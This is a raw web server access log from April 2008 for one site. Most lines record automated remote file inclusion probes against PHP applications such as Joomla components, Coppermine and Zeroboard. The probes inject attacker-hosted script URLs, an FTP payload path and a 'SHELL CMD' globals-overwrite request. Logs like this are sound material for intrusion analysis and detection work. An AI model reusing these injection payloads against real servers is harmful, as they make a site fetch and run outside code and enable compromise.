81.52.143.15 - - [10/Apr/2008:09:36:33 -0700] "GET /presto/?M=A HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:09:36:40 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:36:45 -0700] "GET /logs/access_080128.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:36:50 -0700] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.112.193.46 - - [10/Apr/2008:09:36:51 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.176.255.158 - - [10/Apr/2008:09:36:52 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.176.255.158 - - [10/Apr/2008:09:36:55 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.176.255.158 - - [10/Apr/2008:09:36:55 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:37:00 -0700] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.244.197.249 - - [10/Apr/2008:09:37:12 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:37:27 -0700] "GET /logs/access_080218.log//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:37:29 -0700] "GET //index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:37:29 -0700] "GET /logs//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:37:36 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:37:39 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:37:40 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:09:37:44 -0700] "GET /homepage.php?sel=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:09:37:44 -0700] "GET /logs/homepage.php?sel=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:09:37:55 -0700] "GET /logs/access_080126.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:09:38:02 -0700] "GET /logs/access_080401.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:38:16 -0700] "GET /logs/access_080128.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:38:32 -0700] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:38:58 -0700] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:39:31 -0700] "GET //index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:39:32 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
24.176.255.158 - - [10/Apr/2008:09:39:38 -0700] "GET /logs/access_071217.log//skin/zero_vote/ask_password.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:09:39:45 -0700] "GET /index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
218.216.120.163 - - [10/Apr/2008:09:39:50 -0700] "GET /index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:39:56 -0700] "GET /logs/access_080225.log//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.132.91 - - [10/Apr/2008:09:40:04 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
202.179.180.45 - - [10/Apr/2008:09:40:05 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "www.dmulk.com"
85.114.132.91 - - [10/Apr/2008:09:40:09 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
202.179.180.45 - - [10/Apr/2008:09:40:12 -0700] "GET / HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:09:40:18 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.34.218 - - [10/Apr/2008:09:40:19 -0700] "GET /logs//index.php?body=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
85.214.34.218 - - [10/Apr/2008:09:40:22 -0700] "GET //index.php?body=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:40:38 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:40:43 -0700] "GET //index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:09:40:54 -0700] "GET /logs/index.php?go=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:09:41:01 -0700] "GET /index.php?go=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
208.16.236.69 - - [10/Apr/2008:09:41:05 -0700] "GET /index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.87.105 - - [10/Apr/2008:09:41:14 -0700] "GET /config.inc.php?path_escape=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:09:41:17 -0700] "GET /logs/access_080215.log//?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:09:41:20 -0700] "GET //?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:09:41:20 -0700] "GET /logs//?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 200 42556 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:09:41:43 -0700] "GET /logs/access_080128.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:09:41:43 -0700] "GET /logs/access_080309.log//?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:09:41:44 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:42:03 -0700] "GET /logs/access_080118.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.114.174.160 - - [10/Apr/2008:09:42:13 -0700] "GET /logs/access_080312.log//oneadmin/config.php?path[docroot]=http://www.unescoulsan.org/bbs//data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.114.174.160 - - [10/Apr/2008:09:42:16 -0700] "GET /logs/access_080312.log//oneadmin/config.php?path[docroot]=http://www.unescoulsan.org/bbs//data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:09:42:27 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.179.218 - - [10/Apr/2008:09:43:33 -0700] "GET /logs/NICKhttp://www.welkominfo.co.za/lapa/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
207.58.179.218 - - [10/Apr/2008:09:43:33 -0700] "GET /NICKhttp://www.welkominfo.co.za/lapa/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:09:43:38 -0700] "GET /port.php?content=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:09:43:38 -0700] "GET /logs/port.php?content=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
62.112.193.46 - - [10/Apr/2008:09:43:39 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.216.120.163 - - [10/Apr/2008:09:43:46 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.46.131.186 - - [10/Apr/2008:09:43:48 -0700] "GET //zeroboard//skin/zero_vote/error.php?dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.46.131.186 - - [10/Apr/2008:09:43:48 -0700] "GET //zeroboard//skin/zero_vote/error.php?dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.46.131.186 - - [10/Apr/2008:09:43:48 -0700] "GET //zeroboard//skin/zero_vote/error.php?dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:09:43:54 -0700] "GET /logs/access_080225.log/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:09:43:54 -0700] "GET /logs/access_080225.log/index.php?pagina1=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:09:43:55 -0700] "GET /logs/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:09:43:55 -0700] "GET /logs/index.php?pagina1=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.216.120.163 - - [10/Apr/2008:09:43:58 -0700] "GET /logs/access_080225.log/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.216.120.163 - - [10/Apr/2008:09:43:58 -0700] "GET /logs/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.16.236.69 - - [10/Apr/2008:09:44:19 -0700] "GET /logs/access_080225.log/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [10/Apr/2008:09:44:19 -0700] "GET /logs/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:09:44:22 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:09:44:23 -0700] "GET //modules/xfsection/modify.php?dir_module=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:09:44:23 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:09:44:28 -0700] "GET /logs/access_080131.log/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:09:44:28 -0700] "GET /logs/access_080131.log/index.php?pagina1=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.16.236.69 - - [10/Apr/2008:09:44:36 -0700] "GET /logs/access_080131.log/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.54.52 - - [10/Apr/2008:09:44:55 -0700] "GET /backup2/ HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:44:59 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:44:59 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=SHELL%20CMD???? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:44:59 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.207.204.13 - - [10/Apr/2008:09:45:05 -0700] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://it.geocities.com/biglionp0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [10/Apr/2008:09:45:05 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://it.geocities.com/biglionp0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [10/Apr/2008:09:45:05 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://it.geocities.com/biglionp0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.216.120.163 - - [10/Apr/2008:09:45:22 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:45:22 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:45:29 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:45:29 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=SHELL%20CMD???? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:45:30 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.244.197.249 - - [10/Apr/2008:09:45:36 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.244.197.249 - - [10/Apr/2008:09:45:37 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.216.120.163 - - [10/Apr/2008:09:45:51 -0700] "GET /logs/access_080128.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.216.120.163 - - [10/Apr/2008:09:45:52 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:09:45:58 -0700] "GET /logs/access_080225.log/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:09:45:58 -0700] "GET /logs/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.216.120.163 - - [10/Apr/2008:09:46:03 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:46:12 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.207.204.13 - - [10/Apr/2008:09:46:14 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://it.geocities.com/biglionp0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:46:15 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=SHELL%20CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.244.197.249 - - [10/Apr/2008:09:46:19 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:09:46:25 -0700] "GET /logs/access_080131.log/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.181 - - [10/Apr/2008:09:46:42 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.heimkinopage.de/members/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
81.177.16.181 - - [10/Apr/2008:09:46:42 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.heimkinopage.de/members/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:09:47:24 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:09:47:24 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:09:47:51 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:09:48:16 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:09:48:20 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:09:48:23 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.116.174.9 - - [10/Apr/2008:09:48:46 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/reyen/file/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.34.194.212 - - [10/Apr/2008:09:49:47 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.34.218 - - [10/Apr/2008:09:50:28 -0700] "GET /logs//index.php?canal=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
217.16.16.208 - - [10/Apr/2008:09:50:28 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [10/Apr/2008:09:50:29 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [10/Apr/2008:09:50:29 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.34.218 - - [10/Apr/2008:09:50:31 -0700] "GET //index.php?canal=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:50:41 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
